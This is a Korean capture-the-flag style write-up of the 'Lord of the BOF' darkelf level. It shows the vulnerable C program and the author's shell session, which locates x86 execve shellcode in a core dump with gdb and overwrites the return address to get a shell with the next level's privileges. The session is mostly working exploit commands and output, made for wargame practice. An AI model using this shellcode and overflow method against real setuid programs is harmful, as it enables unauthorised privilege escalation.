wolfman->darkelf

[wolfman@localhost wolfman]$ cat darkelf.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - darkelf 

        - egghunter + buffer hunter + check length of argv[1]

*/

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i;

if(argc < 2){

printf("argv error\n");

exit(0);

}

// egghunter 

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

// check the length of argument

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}

strcpy(buffer, argv[1]); 

printf("%s\n", buffer);

        // buffer hunter

        memset(buffer, 0, 40);

}

[wolfman@localhost wolfman]$ vi darkelv.c  /*우선 복사본을 만들어놓습니다*/

[wolfman@localhost wolfman]$ gcc darkelv.c -o darkelv

[wolfman@localhost wolfman]$ ./darkelv `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x13, "\xbf"'`

j

 X?Rh//shh/bin??S?訴€????????????????????????

Segmentation fault (core dumped)

[wolfman@localhost wolfman]$ gdb -q darkelv core

Core was generated by `./darkelv j

                                  X?Rh//shh/bin??S?訴€?????????????????????????.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbf909090 in ?? ()

(gdb) x/50wx $esp /*뜯어서 쉘코드가 어디들어가는지 봤습니다.*/

0xbffffae0: 0x00000000 0xbffffb24    0xbffffb30    0x40013868

0xbffffaf0: 0x00000002 0x08048450 0x00000000 0x08048471

0xbffffb00: 0x08048500 0x00000002 0xbffffb24    0x08048390

0xbffffb10: 0x0804864c 0x4000ae60 0xbffffb1c    0x40013e90

0xbffffb20: 0x00000002 0xbffffc1e    0xbffffc28    0x00000000

0xbffffb30: 0xbffffc59    0xbffffc6b    0xbffffc82    0xbffffca1

0xbffffb40: 0xbffffcc3    0xbffffcd0    0xbffffe93    0xbffffeb2

0xbffffb50: 0xbffffecf     0xbffffee4    0xbfffff03     0xbfffff0e

0xbffffb60: 0xbfffff26            0xbfffff36     0xbfffff3e     0xbfffff48

0xbffffb70: 0xbfffff58     0xbfffff66     0xbfffff74     0xbfffff85

0xbffffb80: 0xbfffff90     0xbfffffa3     0xbfffffe6     0x00000000

0xbffffb90: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffba0: 0x00000005 0x00000006

(gdb) 

0xbffffba8: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffbb8: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffbc8: 0x0000000b 0x000001f9 0x0000000c 0x000001f9

0xbffffbd8: 0x0000000d 0x000001f9 0x0000000e 0x000001f9

0xbffffbe8: 0x00000010 0x0febfbff     0x0000000f  0xbffffc19

0xbffffbf8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc08: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc18: 0x38366900 0x2f2e0036      0x6b726164 0x00766c65

0xbffffc28:0x99580b6a 0x2f2f6852       0x2f686873 0x896e6962 //NOP미끄럼틀과 함께..

0xbffffc38:0x895352e3 0x9080cde1 0x90909090 0x90909090

0xbffffc48: 0x90909090 0x90909090 0x90909090 0xbf909090

0xbffffc58: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc68: 0x00000000 0x00000000

(gdb) 

0xbffffc70: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc80: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc90: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffca0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcb0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcc0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcd0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffce0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcf0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd00: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd10: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd20: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd30: 0x00000000 0x00000000

(gdb) quit

[wolfman@localhost wolfman]$ ./darkelv `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x28\xfc\xff\xbf"'` /*저 주소값을 넣고 다시 공격합니다*/

j

 X?Rh//shh/bin??S?訴€?????????????????????(?

bash$ my-pass

euid = 505

love eyuna

bash$ quit

sh: quit: command not found

bash$ exit

exit

[wolfman@localhost wolfman]$ ./darkelf `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x28\xfc\xff\xbf"'`

j

 X?Rh//shh/bin??S?訴€?????????????????????(?

bash$ my-pass

euid = 506

//쉘이 따였습니다.

후후 하나를푸니 포풍돌파네여

근데.. 푸는방법쓰기 귀찮아서 (다시볼겸 풀이추가했습니다).. 그냥 쉘코드 주소찾고 넣은거에요ㅋㅋ